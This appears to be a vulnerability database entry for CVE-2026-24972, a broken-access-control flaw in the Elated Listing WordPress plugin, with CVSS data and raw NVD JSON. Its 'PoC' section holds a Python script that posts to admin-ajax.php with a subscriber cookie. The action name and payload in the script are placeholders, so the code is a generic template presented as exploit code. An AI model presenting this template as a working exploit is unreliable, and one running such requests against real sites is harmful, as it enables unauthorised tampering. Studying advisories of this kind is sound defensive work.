Security Vulnerability Report
中文
CVE-2026-24972 CVSS 6.5 MEDIUM

CVE-2026-24972

Published: 2026-03-25 17:16:39
Last Modified: 2026-04-24 16:32:54

Description

Missing Authorization vulnerability in Elated-Themes Elated Listing eltd-listing allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Elated Listing: from n/a through <= 1.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Elated-Themes Elated Listing <= 1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_missing_authorization(target_url, cookie): """ PoC for CVE-2026-24972 Missing Authorization """ # The vulnerable endpoint is typically admin-ajax.php in WordPress ajax_url = f"{target_url}/wp-admin/admin-ajax.php" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } # Payload to trigger the vulnerability # 'action' parameter needs to be identified through source code analysis or fuzzing payload = { "action": "eltd_listing_affected_action", "param": "malicious_data" } cookies = { "wordpress_logged_in_hash": cookie } try: response = requests.post(ajax_url, data=payload, headers=headers, cookies=cookies) if response.status_code == 200: print("[+] Request sent successfully. Check if impact occurred.") print(response.text) else: print("[-] Request failed.") except Exception as e: print(f"[!] Error: {e}") # Usage example # exploit_missing_authorization("http://target-wordpress-site.com", "subscriber_cookie_value")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24972", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:39.217", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Elated-Themes Elated Listing eltd-listing allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Elated Listing: from n/a through <= 1.4."}, {"lang": "es", "value": "Vulnerabilidad de Autorización faltante en Elated-Themes Elated Listing eltd-listing permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Elated Listing: desde n/a hasta &lt;= 1.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/eltd-listing/vulnerability/wordpress-elated-listing-plugin-1-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}